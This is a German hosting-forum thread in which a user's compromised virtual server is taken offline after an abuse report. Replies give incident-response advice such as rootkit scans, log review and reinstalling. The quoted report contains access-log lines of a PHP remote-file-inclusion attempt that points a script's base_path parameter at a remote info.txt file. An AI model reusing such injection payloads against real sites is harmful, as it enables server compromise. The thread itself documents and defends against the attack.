CPU Auslastung / Hack ?

911fun

New Member
Hallo Zusammen,

ich habe eine dringende Anfrage und hoffe, dass ihr mir hierbei irgendwie weiterhelfen koennt.

Ich habe den folgenden Server gemietet:
http://www.hosteurope.de/produkt/Virtua ... r-Linux-XL

Neulich habe ich eine eMail vom Hoster erhalten:


Sehr geehrte Damen und Herren,

wir haben eine Beschwerde erhalten, da Ihr Server anscheinend Daten an Server Dritter sendet, die sich dadurch gestört fühlen (Portscans, Bruteforce-Attacken, Kompromittierungsversuche o.ä.) bzw. die Stabilität unseres Netzes beeinträchtigen. Die uns vorliegenden Daten sind unten angegeben.

In den meisten Fällen entstehen solche Probleme durch unsichere
PHP-Skripte und CGIs. Oft reicht es aus, die eingeschleusten
Applikationen (nach Erstellung einer Kopie!) zu entfernen und die unsicheren Skripte zu löschen oder abzusichern. Sie sollten also zunächst Ihr System nach Schwachstellen durchsuchen und herausfinden, auf welchem Wege schädliche Skripte eingeschleust wurden.

Manchmal tritt dieses Phänomen auch auf, wenn Ihr Rechnern von Angreifern übernommen (vulgo: "gehackt") und root/Administrator-Zugang erlangt wurde. Dies ist z.B. möglich, wenn Sicherheitslücken in Diensten bestehen, die nicht durch Updates behoben wurden.

Der Server wurde aufgrund der beschriebenen Aktivitäten von uns heruntergefahren.

Sie können das System allerdings selbst jederzeit wieder starten, um sich des Problems anzunehmen. Bei Virtual Servern ist dies über das VZPP, bei anderen Servern über das Remote Management oder einen Reboot-Auftrag möglich.

Bitte antworten Sie so bald wie möglich auf diese E-Mail, wenn Sie das Problem selbstständig beheben oder anderweitig klären konnten. Bitte antworten Sie auf diese Anfrage per E-Mail, da unser Telefonsupport Ihnen keine weiteren Auskünfte geben kann.

Wir bitten IN JEDEM Fall um eine RÜCKMELDUNG!!


Wenn wir keine Rückmeldung von Ihnen erhalten, der Server aber trotzdem wieder gestartet wird, sind wir bei Anhalten des Problems gezwungen, den Server (auch zu Ihrer Sicherheit) bis zu einer Reaktion durch Sie vom Netz zu nehmen.


> Greetings:
>
> IP Address of attacker: 92.51.134.76
>
> Type of attack: URL Injection -- attempt to inject / load files onto the
> server via PHP/CGI vulnerabilities
>
> Sample log report including date and time stamp (1st field is "request", 2nd
> field is the IP address or the domain name being attacked, and the 3rd field
> is the IP address or domain name of the attacker):
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:35 -0400]
> "GET
> /amp-3.2/includes/base.php?base_path=http://www.sangabuay.com/p/info.txt???
> HTTP/1.1" 500 546 "-" "libwww-perl/5.806" - "-"
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:36 -0400]
> "GET
> /frameset%20pages/store/accessories/amp-3.2/includes/base.php?base_path=http
> ://www.sangabuay.com/p/info.txt??? HTTP/1.1" 500 546 "-" "libwww-perl/5.806"
> - "-"
>
> Request: artistictile.net 92.51.134.76 - - [20/Apr/2009:20:10:37 -0400]
> "GET
> /frameset%20pages/store/accessories/nuheat_prices.html/amp-3.2/includes/base
> .php?base_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 500 546 "-"
> "libwww-perl/5.806" - "-"
>
> NOTES:
>
> URL Injection attacks typically mean the server for which the IP address of
> the attacker is bound is a compromised server.
>
> Please check the server behind the IP address above for suspicious files in
> /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
> /var/spool/squid, and /var/spool/cron Please use "ls -lab" for checking
> directories as sometimes compromised servers will have hidden files that a
> regular "ls" will not show.
>
> Please also check the process tree (ps -efl or ps -auwx) for suspicious
> processes; often times the malware / hack pretends to be an Apache process.
>
> Clam Anti-virus, clamscan, can also be used to find commonly used PHP and
> Perl-based hacks, including various php shells, on a server using the
> "--infected" and "--recursive" options.
>
> You may also want to check out using root kit detection tools -
> chkrootkit -- locally checks for signs of a rootkit, Rootkit.nl - Protect your machine, and http://
> Rootcheck Project as tools which should be used in
> addition to checking the directories and process tree.
>
> ### EOF NOTES ###
>
> Please take appropriate action to stop these attacks from happening.
>
> Thank you very much for your time.



Meine CPU Last schwankt seitdem in regelmaessigen Abstaenden und ist zur Zeit wieder bei
70% geht langsam wieder runter.
 

djrick

Registered User
1.) System in den RescueModus versetzen
2.) Logs lesen lesen lesen lesen lesen
3.) Daten sichern
4.) Eventuell einen Rootkitscanner etc laufen lassen um die Lücke zu finden
5.) Server neuinstallieren und Lücken im Vornerein stopfen
 

djrick

Registered User
Naja ein Anfang steht ja schonmal in deiner Mail:
You may also want to check out using root kit detection tools -
> chkrootkit -- locally checks for signs of a rootkit, Rootkit.nl - Protect your machine, and http://
> Rootcheck Project as tools which should be used in
> addition to checking the directories and process tree.
Und es tut mir leid, aber ich muss es immer wieder betonen: Als Anfänger stellt man sich keinen Server hin, wenn man keine Ahnung was man tut. Das ist genauso als wenn man mit 12 Auto fährt.

Für den Rest: Forensuche / Google. Wir haben hier wöchentlich Threads mit genau diesen Problemstellungen.
 

911fun

New Member
Merci,...

ich werde mal lesen lesen lesen :)


Du hast ja schon Recht, aber wie willst Du sonst eine Seite online stellen...

Trotzdem Danke fuer Deine Antwort....

bzgl der Rootkit Programme... habe ich versucht zu installieren, funktioniert aber nicht so wirklich :-(

Vielleicht mache ich dann in 6 Jahren einen Server Fuehrerschein... :rolleyes:
 

djrick

Registered User
Du hast ja schon Recht, aber wie willst Du sonst eine Seite online stellen...
Webhosting?
bzgl der Rootkit Programme... habe ich versucht zu installieren, funktioniert aber nicht so wirklich :-(
Wahrscheinlich weil dein Server gerade im Rescue Modus ist?
Dann solltest du zunächst rausfinden was bei dir gehackt wurde und deine Daten sichern (SCP, RSYNC, FTP) und auf jedenfall den Server neuinstallieren, denn auch wenn du die Sicherheitslücke offenbar geschlossen hast, weiß man nicht ob der Angreifer noch irgendwo ein Backdoor eingebaut hat.

Ein weiterer Ansatzpunkt wäre auch dieser hier auf der Suche nach dem Angreifer:
Please check the server behind the IP address above for suspicious files in
> /tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
> /var/spool/squid, and /var/spool/cron Please use "ls -lab" for checking
> directories as sometimes compromised servers will have hidden files that a
> regular "ls" will not show.
 

CentY

Registered User
Wenn du es alleine nicht hinbekommst würde ich am Besten in der Suche Rubrik ein Thema aufmachen und jemand suchen der das alles für dich erledigt. Und wie djrick schon sagt wahrscheinlich wäre ein einfaches Webhosting für dich weitaus sinnvoller.
 

redled

New Member
In der Mail vom Support steht alles Wesentliche. Arbeite diese langsam durch.

/p/info.txt suchst Du mal nach der Datei...überall! Ihr Inhalt und der Inhalt Deiner Logfiles dürften Dich auf die richtige Spur bringen.

Gehe auf Spurensuche. Der Lerneffekt dabei ist enorm. Dann kannst Du den Server immer noch platt machen. Gleich plätten ist was für Warmduscher :D. Es sei denn, Du brauchst die Maschine unbedingt. Auch ist noch kein Meister vom Himmel gefallen. Lehrgeld zahlt jeder, auch der SuperDuperAdmin ist irgendwann an der Reihe. So ist das nun einmal.

Installiere mod_security ;) und studiere die Dokumentation.

Viel Erfolg
 

Ben.

Registered User
In der Mail vom Support steht alles Wesentliche.
Ich bezweifle, dass die Schritte in der E-Mail ausreichend sind. Sicherlich sind sie ein guter Anhaltspunkt, aber ausreichen wird das nicht, gerade wenn der Server bereits nachweislich kompromittiert wurde.
 

HornOx

Registered User
Du hast ja schon Recht, aber wie willst Du sonst eine Seite online stellen...
Um bei dem KFZ Vergleich zu bleiben: Was glaubst du was ein LKW Fahrer sagt der mit funktional eingeschränkten Bremsen von der Polizei erwischt wird und seine Ladung pünktlich abliefern will?
/p/info.txt suchst Du mal nach der Datei...überall!
Die Datei befindet sich (wie aus den Logs ersichtlich) auf einem anderen Rechner: http://www.sangabuay.com/p/info.txt Auch bei sowas lohnt sich offensichtlich Arbeitsteilung :D
der Inhalt Deiner Logfiles dürften Dich auf die richtige Spur bringen.
Es gibt viele Hacks die per HTTP/POST funktionieren, da gibt es dann keine Auffälligkeiten in den Logfiles.
Dann kannst Du den Server immer noch platt machen. Gleich plätten ist was für Warmduscher . Es sei denn, Du brauchst die Maschine unbedingt.
Nachdem man sich für die Beweissicherung ein Festplattenimage gezogen hat gibt es keinen Grund mehr den Server nicht zu plätten (und bei der Gelegenheit auch gleich die Software zu aktuallisieren)

btw, in der aktuellen c't ist ein netter Artikell zu PHPIDS...
 
Top